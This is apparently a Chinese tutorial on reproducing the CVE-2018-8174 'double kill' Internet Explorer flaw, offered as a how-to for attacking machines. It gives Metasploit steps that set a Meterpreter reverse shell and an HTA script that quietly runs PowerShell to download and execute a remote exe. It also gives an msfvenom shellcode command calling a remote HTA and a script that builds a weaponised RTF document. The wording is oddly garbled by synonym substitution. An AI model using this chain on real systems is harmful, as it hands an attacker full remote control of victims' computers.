快捷搜索:  网络  后门  CVE  渗透  木马  扫描  黑客  as

CVE-2018-8174 “双杀”0day漏洞复现

近来360核心安全奇迹部高级威胁应答团队在环球范围内领先监控到了一例使用0day漏洞的APT攻击,拿获到了环球首例行使阅读器0day漏洞的新型Office文档攻击,我们将该漏洞命名为“双杀”漏洞。该漏洞影响最新版本的IE阅读器及使用了IE内核的应用程序。用户在阅读网页或关上Office文档时都可能中招,终极被黑客植入后门木马完全控制电脑。

了解更多 http://www.freebuf.com/articles/paper/171254.html

POC验证

未打补丁体系,黑客工具,IE阅读器关上此地址会弹出计算器 。

http://test.lr3800.com/CVE-2018-8174_PoC.html

bb5e6176bf9a67200484199680e96f87.png

metasploit 复现

下载 metasploit 模块到内陆

git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

将CVE-2018-8174.rb复制到 fileformat 目录

cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

将CVE-2018-8174.rtf复制到 exploits 目录

cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

启动 metasploit

use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.0.116
set lhost 192.168.0.116
exploit

58858df35a658d45a4a39cda1c0cde40.png复制 /root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档关上
或者IE阅读器关上 http://192.168.0.116:8080 即可获得会话

自定义下载者 复现

行使 mshta 从遥程服务器下载文件执行。

请先下载poc附件,下文中使用 链接:https://pan.baidu.com/s/14vP4CMdjEKkRdHBb7vLSHg 暗码:ci8h

1.组织HTA文件,当走访hta文件就会触发powershell下载文件至暂且目录执行

预备你的xx.exe文件上传至站点目录,倘使得到地址 http://xxx.com/xxx.exe

802a8dd6ffc42f58a9cc3b6c6b1b41cf.pngHTA代码:

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://xxx.com/xxx.exe\', \'c:/windows/temp/xxx.exe\'); c:/windows/temp/xxx.exe', 0);window.close();
</script>

把该文件命名 8174.hta 上传至站点目录;倘使得到地址 http://xxx.lr3800.com/8174.hta

2.使用msfvenom生成 js Shellcode

msfvenom -p windows/exec cmd='mshta http://xxx.lr3800.com/8174.hta' -f js_le exitfunc=thread -a x86

001a4a295242e809c0878a68eec4e91a.png把生成的Shellcode字符替代至 8174poc.html 166行代码

46cdbb714b067c132fda956e3e515c64.png6f1673bcee0fcab7a38d7545e77240c0.png把 8174poc.html 文件上传至站点目录 倘使得到地址 http://xxx.lr3800.com/8174poc.html

3.生成Word文档

* 下载python脚本保存内陆

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

运行 CVE-2018-8174.py

python CVE-2018-8174.py -u http://xxx.lr3800.com/8174poc.html -o exp.rtf

6bd891b33bfdf6581e32ba199e229c4e.png得到目录中的 “exp.rtf ”文件,使用Word文档关上即可下载执行xx.exe文件,或者IE阅读器关上 http://xxx.lr3800.com/8174poc.html 即可下载执行xx.exe文件

样本演示运行结果 https://app.any.run/tasks/3c52b2b2-3fb7-42ff-a3bf-14429b17b112

您可能还会对下面的文章感兴趣: